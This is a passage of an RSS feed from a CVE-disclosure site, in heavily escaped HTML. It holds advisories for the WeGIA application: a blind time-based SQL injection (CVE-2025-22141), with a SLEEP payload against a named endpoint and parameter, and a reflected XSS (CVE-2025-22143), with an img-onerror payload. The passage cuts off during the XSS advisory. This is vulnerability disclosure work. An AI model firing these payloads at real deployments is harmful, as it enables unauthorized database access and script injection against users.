class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)))&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;PXhT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22140/401184112-8c1267f3-ce5d-4a61-adfd-2e9edce5b960.png&amp;#34;
	width=&amp;#34;1286&amp;#34;
	height=&amp;#34;487&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22140/401184112-8c1267f3-ce5d-4a61-adfd-2e9edce5b960_hu_ede9a0d63418d069.png 480w, /p/cve-2025-22140/401184112-8c1267f3-ce5d-4a61-adfd-2e9edce5b960_hu_b70d689fa329f806.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;264&amp;#34;
		data-flex-basis=&amp;#34;633px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22140/401184151-d89f4a8a-8dc4-4d34-b10e-3bfc0792146c.png&amp;#34;
	width=&amp;#34;1287&amp;#34;
	height=&amp;#34;485&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22140/401184151-d89f4a8a-8dc4-4d34-b10e-3bfc0792146c_hu_366a6388e3c66e66.png 480w, /p/cve-2025-22140/401184151-d89f4a8a-8dc4-4d34-b10e-3bfc0792146c_hu_cd1b2d0fb42f4943.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;265&amp;#34;
		data-flex-basis=&amp;#34;636px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Data exfiltration.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Application disruption.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reconnaissance and enumeration.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compromising user credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business impact.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mrhp-wfp2-59h5&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xrjq-57mq-4hf8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 08 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22141</title>
        <link>https://www.cvehunters.com/p/cve-2025-22141/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22141/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22141-sql-injection-blind-time-based-endpoint-verificar_recursos_cargophp-parameter-cargo&amp;#34;&amp;gt;CVE-2025-22141: SQL Injection (Blind Time-Based) endpoint &amp;lt;code&amp;gt;verificar_recursos_cargo.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22141&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22141&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the &amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt; endpoint, specifically in the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;  parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; parameter. This allows attackers to inject malicious SQL payloads that are executed directly by the database. This could result in unauthorized access to sensitive information, data manipulation, and operational disruptions.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22141-sql-injection-blind-time-based-endpoint-verificar_recursos_cargophp-parameter-cargo&amp;#34;&amp;gt;CVE-2025-22141: SQL Injection (Blind Time-Based) endpoint &amp;lt;code&amp;gt;verificar_recursos_cargo.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22141&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22141&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the &amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt; endpoint, specifically in the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;  parameter. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity, and availability of the database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; parameter. This allows attackers to inject malicious SQL payloads that are executed directly by the database. This could result in unauthorized access to sensitive information, data manipulation, and operational disruptions.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-sql&amp;#34; data-lang=&amp;#34;sql&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt;  &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;AND&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;SELECT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;7525&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;FROM&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;SELECT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;SLEEP&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)))&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;PXhT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22141/401181933-b5872753-8d9e-4ab8-8db4-364adbfd9f27.png&amp;#34;
	width=&amp;#34;1296&amp;#34;
	height=&amp;#34;514&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22141/401181933-b5872753-8d9e-4ab8-8db4-364adbfd9f27_hu_91ea567002b928f1.png 480w, /p/cve-2025-22141/401181933-b5872753-8d9e-4ab8-8db4-364adbfd9f27_hu_d5f826b8de5f5798.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;252&amp;#34;
		data-flex-basis=&amp;#34;605px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22141/401182010-85fbb21d-bb04-450a-93dd-9b951fe0f8d9.png&amp;#34;
	width=&amp;#34;1262&amp;#34;
	height=&amp;#34;525&amp;#34;
	srcset=&amp;#34;/p/cve-2025-22141/401182010-85fbb21d-bb04-450a-93dd-9b951fe0f8d9_hu_82b1770cfbaa28a2.png 480w, /p/cve-2025-22141/401182010-85fbb21d-bb04-450a-93dd-9b951fe0f8d9_hu_6adf3018282008f1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;240&amp;#34;
		data-flex-basis=&amp;#34;576px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Data exfiltration.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Application disruption.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reconnaissance and enumeration.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Compromising user credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Business impact.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-w7hp-2w2c-p636&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-w7hp-2w2c-p636&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 08 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22143</title>
        <link>https://www.cvehunters.com/p/cve-2025-22143/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22143/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22143-cross-site-scripting-xss-reflected-endpoint-listar_permissoesphp-parameter-msg_e&amp;#34;&amp;gt;CVE-2025-22143: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;listar_permissoes.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22143&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22143&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;listar_permissoes.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/geral/listar_permissoes.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-22143-cross-site-scripting-xss-reflected-endpoint-listar_permissoesphp-parameter-msg_e&amp;#34;&amp;gt;CVE-2025-22143: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;listar_permissoes.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-22143&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-22143&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;listar_permissoes.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /html/geral/listar_permissoes.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to validate and sanitize user inputs in the &amp;lt;code&amp;gt;msg_e&amp;lt;/code&amp;gt; parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user&amp;#39;s browser in the server&amp;#39;s response and executed within the context of the victim&amp;#39;s browser.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-22143/401159443-ca95f575-8f7d-4402-97e2-b2ebfa90fa9b.png&amp;#34;
	width=&amp;#34;808&amp;#34;
	height=&amp;#34;555&amp;#34;
